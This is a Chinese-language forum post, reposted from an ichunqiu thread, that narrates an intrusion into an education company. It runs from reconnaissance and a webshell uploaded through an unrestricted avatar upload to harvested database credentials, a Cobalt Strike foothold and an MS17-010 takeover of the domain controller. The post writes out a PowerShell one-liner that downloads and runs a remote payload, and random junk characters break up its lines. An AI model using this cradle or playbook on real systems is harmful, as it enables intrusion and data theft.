- y+ k4 O; p Z( h* b; T9 s& c- f( o; L 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路0 @+ [+ C& u/ g* j B6 f
/ ^% J2 `) e! R: _! _
: G, Y+ r7 \- @' z } ~' k
$ E1 U* f& \! I& ~ t
8 e0 a* n" I% d2 x/ V# Z3 k p+ F0 H( F- o, N
正文& t& D" L$ \5 B" J& t) ?' i7 a" x* q- U
& N8 B7 e$ G$ C4 i K" G
( e$ [, u8 `2 Y/ y, z0 c; t" B
, `3 `' J, | x0 H0 m+ c3 H + R1 Z5 \4 }. z/ @" H; j
: p @! v9 g; u Y 目标:www.xxxx.com(一家教育机构)
" p3 j" D) A1 q# \打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能$ S2 x0 S8 B$ G; I9 O$ p5 S
/ k' v$ x* r9 x+ c% S/ g
+ \3 G; C# Y0 p
- A1 D8 x/ x3 W9 t: K0 n1 p! ~" ]( g
# }" t3 ?6 n- O) T1 g$ X" X0 R( x) \, O' t9 J. J
进行了简单的信息搜集 - ]" u2 I+ |) |' V: [$ I* n7 U
! Q$ \ @2 Q/ U! I! J
* U& }: C, ?) l" `
, |+ i- }- u+ w, G B* N" D
! m7 ~$ f! a2 m( `" r) A1 z- h7 Z 子域名搜集) ^# l9 o4 b: @
) s1 F9 r! f& L6 Z0 t$ z
& {. n9 p6 @4 V6 N
* \6 U7 z6 _, g2 q$ g) s : `+ Z; U4 d7 M5 G5 ]/ r
2 L7 e; g- N0 E, B4 o: {3 v) U) @
fofa找资产 . t- g2 n; D; D9 ~4 F
. X% {+ G) d* e1 C$ K1 P
, a9 _+ l0 h+ F- c; X
9 n+ o0 a/ T! F7 n+ W8 |( ?: H7 C% W, {, J, d. p
: P3 j: Z. k: f. }$ ]& K
" P+ ^) M. Y2 q# T, p" f6 Y6 S4 {& K7 ^: e
一共七个资产。去重之后只有两个。 % D" W6 Y0 d/ G4 O% a3 K' z8 N
3 [5 C- L' o9 ~ I6 c$ X3 Q6 C* \! n
' a9 _; u- w1 _ M" g
. q, y5 h' L* P 目录探测
: m" R1 n. I `8 N* }* m" g- ]
* V6 Q6 p# Q C: L3 S( V r
0 o& H7 L V3 u4 ` t* Y- q
Z5 w6 C! F( T3 Q& p! V
2 z- f% f: [1 }3 l; S$ V$ r! K6 b5 e' q
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 ; I8 \! H* ]" e9 o; N
+ \1 a _+ v& p, ]7 N" o9 [
% i. [/ ~0 @# Y+ V/ j' L( U 2 m& y6 r2 ^+ d+ ]- ?# }; P
. l4 G: W0 \( [
我又尝试了通过修改返回包来绕过登录界面
, S z7 ~) ~0 `1 ~' I" Q) R ( ?3 f4 c6 S0 G- f H4 J
- T g5 Q/ m+ h" y3 w; N
- r2 f7 u# U0 y+ O6 T
2 o/ [9 O- Z! H) G6 o& p3 d! X1 w& k5 f
7 ?$ ^9 \3 Z* `5 c* u
还是不行,尝试注入无果
$ p0 ]" \6 o! S+ Z# G' N% a( s
o1 s6 C) q5 C: W6 n1 j0 w
8 d5 H; x/ P& e6 Z& ~ 0 P9 T, N1 @0 s0 |" A
1 F- P) w# F$ D
( j6 b- S9 a. ~/ o 不过我目录探测出了一处Spring信息泄露 1 u+ C7 c- _7 q) f0 c; ]- c7 }
+ T0 q `5 S' Y2 A9 m8 T
) `! j5 B4 c4 f3 d4 t- {/ J) r% y
: o8 X9 w5 ^3 a% e& G, B% v1 J
% s- f6 E2 s% [& W6 N" V
5 u3 X9 {# d9 [' s) Z7 u
$ a8 |7 Z2 ]# `' X! M+ n( j) \* W
& a( U2 F" Y+ s y 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录* ^" g. h, R$ X# C
8 e% Y7 x# G: S# q+ I& w
9 i6 t D3 u6 V! }! w# l
! C; z1 H; ^5 }8 Y- [
$ @" U, b9 \$ |/ ]/ d
7 j8 e5 m' w0 a$ M) Y | 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
6 k3 {8 I6 |/ C/ H4 K
/ Z$ D% d9 D+ a/ q
. R E8 C6 k$ ~
+ T1 _, o9 E6 r$ {1 @1 J
4 m+ Q! c2 y5 ^) x: D4 _
: y+ V* J6 g$ Z4 } 获取有些师傅到这一步就手机抓包电脑测了。0 M) f( X B, S6 _ Z3 N, G" @
) K% |$ w# N* L. l- j; B. ]: h
1 Z* C' H! A/ S. }# Z6 c4 U
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
# {5 m; B) n# F( h/ I- D7 e 1 w4 Y' x$ W7 i6 p# j$ x
3 k+ h! l; q5 V/ R4 k8 f
其中在一个公众号发现了小程序,可以进行注册。* e% e* w$ }( g" g. F
" b* E- J. w: I8 E" C; H- l
& b1 ~$ n5 S2 S2 E
看到了头像上传,尝试上传获取WebShell
: T a, U3 m' i E/ C: B ( C; V6 e* _: G+ q
4 D; n: ^# r4 b2 r2 V9 N
! t: d) P+ q+ Q5 e [7 c9 T
, W( P9 }* C' U% |: R& N) F/ N0 Y7 k' n
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问+ t, B& e3 q' b9 a9 K9 c' \
+ m7 L1 q) A+ f9 Y% T+ e9 |
, x0 m0 r% ^0 `. t7 Z+ }0 \5 G" d
3 _8 I9 O; R$ E& l) b# ~$ c0 x
' e* [7 b' ^! u" k: q2 _0 V/ V+ @) c# I. h3 d" K
然后上了大马
0 _0 l0 ?1 o( B2 E: O , X' M+ W2 U7 w N$ E% Q( u
5 d- Q5 g: |2 `
' ~# ]3 s4 f8 `' D) ?' Q' G" J
' z8 Y% }7 [7 P4 v( E% L. T
0 J0 q7 Z: ^" Y: c$ J & ]1 K+ ^! i6 k+ Y+ _
% C1 [2 o* _8 M) B* V
( c" X% t+ Z3 ^% n- k# C2 X! X
通过翻找文件发现数据库账号密码& j1 L& i1 Z' }$ v, G" d+ U: @$ d! d
/ }' Y, O5 z* h( u. v
$ E0 J* p7 I. J: S; x
: x2 f8 r+ j- z7 n& v - L1 E0 s$ c; s% b7 q& A
) m$ D$ B4 K7 p/ p' J: \7 m v, ~
--内网渗透
; m. A0 c6 m8 @% f " F- ?/ k9 d. V/ {0 K5 m$ ? b9 A
" B5 C, N6 }& I, G 直接通过powershell执行 cs上线
1 a Q: X+ `: J9 b0 i; `5 F 7 } N) L2 L: U2 V/ j7 {/ \
3 [/ p4 R) A' o F powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"& g% j1 t; O; t R G
, \% [6 i6 L! [5 y4 X1 ^8 b% q, R
3 k$ o9 B7 o; L$ ~) n ! c! `! o; E2 Y ~0 t
4 G* x" C2 }; e9 {9 v
$ s" G0 o( D9 Z+ z+ f" Y9 W9 ]' I 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破9 h7 q! T0 X! n4 A |
8 ?# a. M* q2 D) C: k* N
3 v3 f4 q/ T% U& r! X9 o3 F! m
b/ H4 m2 D/ c `! `
1 t/ ?. V$ n0 y+ i0 N3 n3 [, q$ O' C7 a; u7 T2 m& Z6 f
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
- j- U* @9 T( ~% S6 X * S/ I+ Z) C$ s/ v( S9 s. |
' R5 {; j0 Y4 [* f) I! z
' h$ J* S9 V' e5 f; P* g/ Q& R. O
7 O' P3 j9 f( X4 w2 z
* Q: W2 F& u5 d5 l% K
1 h/ J& w, C1 B! i; ~ 7 R0 u$ ?& z) w
+ u7 S" b+ X5 J. W* `5 b
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 / t f, W/ x' n [0 N) X
9 N; N( j' s! T* V3 F; l: E0 @* r; U! u
* r! |- ?4 d: Y7 n! |
$ G' f! d3 Z! T* l
0 t" D, O6 p7 B) Y' b 0 p" I& e: ^. M& r$ O2 T7 ]/ E
; R- b# G* E- Q. S
4 M# S, D% q6 h# } 3 M7 M5 c, ?; `7 T9 ^: s
( H" S$ s* x9 ~
- U7 N( l4 a5 b1 f3 b$ ^
6 e7 M" C0 j" V
% w- P7 I h: B6 m K# |. v2 g
$ e% K1 ^0 _* s2 k3 Q1 H
2 g c; H+ ?' Y: c# Y% a+ t# B 小结. w& m% e6 K# A* b$ L
: T, E- S! s" Y: C3 a( D! V% y( {: T
! E( k) {0 N5 \! O, e
" t' P6 u8 K1 ]5 F8 Q3 v0 `. l
- ~' L) B0 m' _. p2 i8 C* p8 o
7 `6 Y' p9 R6 y `6 X" ^& U# _
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!) z- ^, M( i! {$ e, V
6 l$ G1 j( ] q) s- K- h4 r8 v9 Y% j7 m( W1 Z: n n( e
# O7 O) j( E U* v8 S/ @, G7 u
0 M. Z$ ?/ n; v6 d0 R. X
4 N" d9 A+ B- Q9 @+ W3 B* g; A2 P - / P5 i" p) }& h4 M7 f
* B" I& ?$ Q8 ?4 _' Z0 S4 a
5 J8 ?6 h3 @ |4 D/ e
-
" S( }6 o# L3 s0 p ( S) ?9 W u6 x6 I
# C& A" @4 q, M" T1 i& F6 e- H
" Y" r3 Q& {, f* a
6 X2 c. C4 E d; b4 l$ B3 Y 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
2 e6 Q0 X8 p% f+ j5 [ c 7 m! I$ J. R% r: p y9 t
1 U% F" f# C4 }/ S I: O
7 ]3 S( d V" v |+ {
|